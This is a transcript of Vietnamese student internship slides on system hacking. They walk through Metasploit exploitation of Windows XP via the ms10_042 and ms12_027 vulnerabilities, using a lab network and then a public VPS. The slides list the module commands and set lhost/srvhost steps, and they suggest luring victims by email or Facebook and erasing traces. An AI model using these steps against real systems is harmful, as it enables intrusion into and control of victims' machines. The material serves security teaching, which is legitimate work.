slide báo cáo cuối kì system hacking-trần nguyễn lộc

31
BÁO CÁO THỰC TẬP SYSTEM HACKING GVHD: Thầy Đỗ Thắng SVTT: Trần Nguyễn Lộc

Upload: loc-tran

Post on 21-Jan-2017

287 views

Category:

Education


11 download

TRANSCRIPT

Page 1: Slide báo cáo cuối kì system hacking-Trần Nguyễn Lộc

BÁO CÁO THỰC TẬP

SYSTEM HACKING

GVHD: Thầy Võ Đỗ Thắng

SVTT: Trần Nguyễn Lộc

Page 2: Slide báo cáo cuối kì system hacking-Trần Nguyễn Lộc

MỤC LỤC

Giới thiệu 1

2

T 3 Tổng Kết

Thực hiện

Page 3: Slide báo cáo cuối kì system hacking-Trần Nguyễn Lộc

Giới thiệu

• Theo thống kê của công ty Bkav, từ đầu năm 2013 đến nay, tại Việt Nam đã có 2.405 website của các cơ quan, doanh nghiệp bị xâm nhập, trung bình mỗi tháng có khoảng 300 website bị tấn công

• Hiện nay, các thiết bị như máy tính PC, laptop, đều có kết nối mạng nội bộ hoặc kết nối Internet . Trên các thiết bị này, hầu hết cài đặt các phần mềm ứng dụng như IE, Microsoft Office, Adobe Reader ,…. và chạy hệ điều hành như Windows XP, Windows 7…

Page 4: Slide báo cáo cuối kì system hacking-Trần Nguyễn Lộc

Giới thiệu system hacking

Hacker có thể thực hiện mọi thứ trên máy tính đó, gây ra

những hậu quả vô cùng nghiêm trọng cho các cá nhân, tổ

chức

Gồm những kỹ thuật lấy username, password dựa vào phần

mềm cài trên hệ thống hoặc các dịch vụ từ xa của hệ điều

hành Windows

Nâng quyền trong hệ thống, sử dụng keyloger để lấy thông

tin, xóa những log file hệ thống

Page 5: Slide báo cáo cuối kì system hacking-Trần Nguyễn Lộc

Quá trình tấn công vào một hệ thống

Enumerate (liệt kê): Trích ra tất cả những thông tin có

thể về user trong hệ thống. Sử dụng phương pháp thăm

dò SNMP để có được những thông tin hữu ích, chính

xác hơn Crack: Công đoạn này có lẽ hấp dẫn nhiều Hackernhất.

Bước này yêu cầu chúng ta bẽ khóa mật khẩu đăng

nhập của user. Hoặc bằng một cách nào khác, mục tiêu

phải đạt tới là quyền truy cập vào hệ thống Escalste (leo thang): Nói cho dễ hiểu là chuyển đổi

giới hạn truy cập từ user binh thường lên admin hoặc

user có quyền cao hơn đủ cho chúng ta tấn công

Execute (thực thi): Thực thi ứng dụng trên hệ thống

máy đích. Chuẩn bị trước malware, keylogger,

rootkit…để chạy nó trên máy tính tấn công Hide (ẩn file): Những file thực thi, file soucecode chạy chương trình… Cần phải được làm ẩn đi, tránh bị mục

tiêu phát hiện tiêu diệt Tracks (dấu vết): Tất nhiên không phải là để lại dấu

vết. Những thông tin có liên quan đến bạn cần phải bị

xóa sạch, không để lại bất cứ thứ gì. Nếu không khả

năng bạn bị phát hiện là kẻ đột nhập là rất cao.

Tóm lại, quá trình tấn công hệ

thống (System hacking) là

bước tiếp theo sau quá trình

khảo sát, thu thập thông tin

của mục tiêu cần tấn công

bằng những kỹ thuật như

Footprinting, Social

engineering, Enumeration,

Google Hacking… đã được áp

dụng cho mục đích truy tìm

thông tin.

Page 6: Slide báo cáo cuối kì system hacking-Trần Nguyễn Lộc

Hệ điều hành Backtrack 5 R3

- Backtrack là một bản phân phối dạng Live DVD của

Linux, được phát triển để thử nghiệm xâm nhập.

Backtrack là sự hợp nhất giữa 3 bản phân phối khác

nhau của Linux về thâm nhập thử nghiệm IWHAX,

WHOPPIX, và Auditor. Trong phiên bản hiện tại của

nó (5), Backtrack được dựa trên phiên bản phân phối

Linux Ubuntu 11.10.

- Backtrack 5 chứa một số công cụ có thể được sử dụng

trong quá trình thử nghiệm thâm nhập của chúng ta

Page 7: Slide báo cáo cuối kì system hacking-Trần Nguyễn Lộc

Phần mềm Metasploit

• Metasploit là một dự án bảo mật máy tính cung cấp

các thông tin về vấn đề lỗ hổng bảo mật cũng như

giúp đỡ về kiểm tra thăm nhập và phát triển hệ thống

phát hiện tấn công mạng.

• Metasploit có thể chạy trên hầu hết các hệ điều hành:

Linux, Windows, MacOS.

Page 8: Slide báo cáo cuối kì system hacking-Trần Nguyễn Lộc

Sơ đồ tổng quan hệ thống mạng LAN

Trong một mạng LAN nội bộ,

các máy tính thường kết nối với

nhau với khoảng cách vật lý

gần như trong một phòng, một

tầng, một tòa nhà, công ty, …

Các máy tính trong mạng LAN

có thể chia sẻ tài nguyên với

nhau, mà điển hình là chia sẻ

tập tin, máy in, máy quét và

một số thiết bị khác

.Tấn công mạng Lan

Page 9: Slide báo cáo cuối kì system hacking-Trần Nguyễn Lộc

CHUẨN BỊ

1 máy backtrack 5 R3 có địa chỉ IP: 172.16.0.9(máy tấn

công).

1 máy win XP có địa chỉ IP 172.16.0.10(máy bị tấn

công).

Page 10: Slide báo cáo cuối kì system hacking-Trần Nguyễn Lộc

Xâm nhập và khai thác

Windows XP

• Nhận dạng

Lỗ hổng này có thể cho phép thực thi mã từ xa

nếu người dùng xem một trang web thiết kế đặc

biệt bằng cách sử dụng một trình duyệt web hoặc

nhấp vào một liên kết thiết kế đặc biệt trong một

thông báo e-mail.

Khai thác lổ hổng Ms10-042

Page 11: Slide báo cáo cuối kì system hacking-Trần Nguyễn Lộc

• Thực hiện

Xâm nhập và khai thác

Windows XP

Mở Metasploit trên Backtrack 5 bằng lệnh: msfconsole

Từ dấu nhắc sử dụng lệnh: msf > search ms10_042

Copy đường dẫn, enter gõ use “dán đường dẫn vào”

Gõ show options để thấy các options của lệnh.

msf exploit(ms10_042_helpctr_xss_cmd_exec) > show options

Page 12: Slide báo cáo cuối kì system hacking-Trần Nguyễn Lộc

Dùng lệnh set srvhost, lhost, exploit

- Set srvhost 172.16.0.9 -> set địa chỉ IP của máy backtrack 5 R3

- Set lhost 172.16.0.9 -> set địa chỉ IP của máy backtrack 5 R3

- Lệnh exploit để bắt đầu xâm nhập trên máy nạn nhân.

Page 13: Slide báo cáo cuối kì system hacking-Trần Nguyễn Lộc

Sau khi thực hiện lệnh exploit , thì sẽ tạo ra 1 đường link chứa mã độc , mà

khi nạn nhân kích vào, thì lập tức sẽ nhiễm mã độc và lúc này backtrack 5

sẽ chiếm toàn quyền điều khiển trên máy bạn nhân.(việc lừa nạn nhận kích

vào mã độc tùy vào khả năng của hacker như gửi mail hoặc gửi qua

facebook …., tùy vào khả năng của mỗi người)

Page 14: Slide báo cáo cuối kì system hacking-Trần Nguyễn Lộc

Tới bước này là ta có thể chiếm được toàn quyền điều khiển trên máy

nạn nhân như: xem thông tin trên máy nạn nhân,thêm ,xóa ,sửa file,

thư mục ….. trên máy nạn nhân.

Page 15: Slide báo cáo cuối kì system hacking-Trần Nguyễn Lộc

Xem thông tin trên máy nạn nhân

Tạo thư mục backdoor thành công.

Page 16: Slide báo cáo cuối kì system hacking-Trần Nguyễn Lộc

Xâm nhập và khai thác

Windows XP

a) Mô tả:

Mục tiêu của việc khai thác mã lỗi này là khai thác lỗ hổng của

Microsoft office (word ) trên window.

Một kẻ tấn công khai thác thành công lỗ hổng có thể lấy được quyền

sử dụng giống như người dùng đăng nhập vào máy tính.

Khai thác lổ hỗng ms12-027

Page 17: Slide báo cáo cuối kì system hacking-Trần Nguyễn Lộc

Mở giao diện console của công cụ metasploit bằng dòng lệnh msfconsole.

Search mã lỗi ms12_027 bằng dòng lệnh :search ms12_027

Tiến hành khai thác mã lỗi bằng dòng lệnh :

use exploit /windows/fileformat/ms12_027_mscomctl_bof.

Xem hệ điều hành có thể khai thác bởi mã lỗi ms12_027

b) Các bước tấn công

Page 18: Slide báo cáo cuối kì system hacking-Trần Nguyễn Lộc

Tiến hành set filename và set lhost

-Lệnh set filename : tạo ra file word có chứa mã độc

-Lệnh set lhost : set địa chỉ IP của máy backtrack 5.

Page 19: Slide báo cáo cuối kì system hacking-Trần Nguyễn Lộc

Sau khi tạo được mã độc là file word , ta tiến hành sao sao chép file

word này lên máy tính nạn nhân bằng nhiều cách như email……Khi

nạn nhân mở file word bị nhiễm mã độc, thì ta có thể chiếm được toàn

quyền điều khiển trên máy nạn nhân, cụ thể là một sessions mới được

tạo ra.

Page 20: Slide báo cáo cuối kì system hacking-Trần Nguyễn Lộc

-Xem thông tin về máy tính nạn nhân sau khi chiếm toàn quyền điều khiển.

-Và có thể thực hiện được những lệnh tấn công khác mà mình muốn.

Page 21: Slide báo cáo cuối kì system hacking-Trần Nguyễn Lộc

Khai thác lỗ hỗng window qua mạng

internet

a) Giới thiệu Honeypot

Honeypot là một hệ thống tài nguyên thông tin được xây dựng với

mục đích giả dạng đánh lừa những kẻ sử dụng và xâm nhập không

hợp pháp, thu hút sự chú ý của chúng, ngăn không cho chúng tiếp

xúc với hệ thống thật. Hệ thống tài nguyên thông tin có nghĩa là

Honeypot có thể giả dạng bất cứ loại máy chủ tài nguyên nào như là

Mail Server, Domain Name Server, Web Server… Honeypot sẽ trực

tiếp tương tác với tin tặc và tìm cách khai thác thông tin về tin tặc

như hình thức tấn công, công cụ tấn công hay cách thức tiến hành

thay vì bị tấn công.

Page 22: Slide báo cáo cuối kì system hacking-Trần Nguyễn Lộc

b) Sơ đồ tổng quan sử dụng Honeypot để xâm nhập từ xa

qua Internet

Page 23: Slide báo cáo cuối kì system hacking-Trần Nguyễn Lộc

Chúng ta – đóng vài trò là Attacker, cần chuẩn bị:

- VPS có địa chỉ IP public, cài đặt sẵn công cụ Metasploit (download tại

http://metasploit.org) đóng vai trò là một Honeypot trên mạng.

Page 24: Slide báo cáo cuối kì system hacking-Trần Nguyễn Lộc

c) Thực hiện khai thác mã lỗi

Khi thác lỗi ms10_042 trong windows xp

-Mục đích của việc khai thác mã lỗi này là khai thác lỗi css trong help center

của IE, sau khi khai thác thành công , ta có thể chiếm toàn quyền điều khiển

trên máy nạn nhân.

-Các bước tiến hành như sau:

• Khởi động chương trình metasploit trên máy chủ vps .

Page 25: Slide báo cáo cuối kì system hacking-Trần Nguyễn Lộc
Page 26: Slide báo cáo cuối kì system hacking-Trần Nguyễn Lộc

• Dùng lệnh search mã lỗi: để xem mã lỗi có toàn tại để khai thác

hay không: Ở đây search 10_042

Page 27: Slide báo cáo cuối kì system hacking-Trần Nguyễn Lộc

Dùng lệnh set srvhost ,lhost , exploit

Dùng lệnh srvhost 14.0.21.113 : để set địa chỉ ip của máy vps.

Dùng lệnh lhost 14.0.21.113 : để set địa chỉ ip của máy vps.

Dùng lệnh Exploit để thực thi mã đã cài đặt, lúc này 1 đường link chứa mã độc

sẽ được tạo ra , và khi nạn nhân kích vào đường link này thì bị nhiễm mã độc và

ta có thể chiếm toàn quyền điều khiển trên máy nạn nhân.

Page 28: Slide báo cáo cuối kì system hacking-Trần Nguyễn Lộc

• Đến đây ta chiếm được toàn quyền điều khiển trên máy nạn nhân

Xem thông tin trên máy nạn nhân

Page 29: Slide báo cáo cuối kì system hacking-Trần Nguyễn Lộc

Tạo thư mục có tên là thư mục mới

Page 30: Slide báo cáo cuối kì system hacking-Trần Nguyễn Lộc

TỔNG KẾT

• Mật khẩu phải được đặt nhiều hơn 8 ký tự và

phải là tổng hợp giữa chữ hoa, chữ thường, số

và ký tự đặc biệt để các chương trình khó dò ra

• Không mở tập tin đính kèm thư điện tử có

nguồn gốc không rõ ràng hoặc không tin cậy

• Chắc chắn rằng bạn có và đã bật hệ thống

tường lửa cho hệ thống của mình.

Page 31: Slide báo cáo cuối kì system hacking-Trần Nguyễn Lộc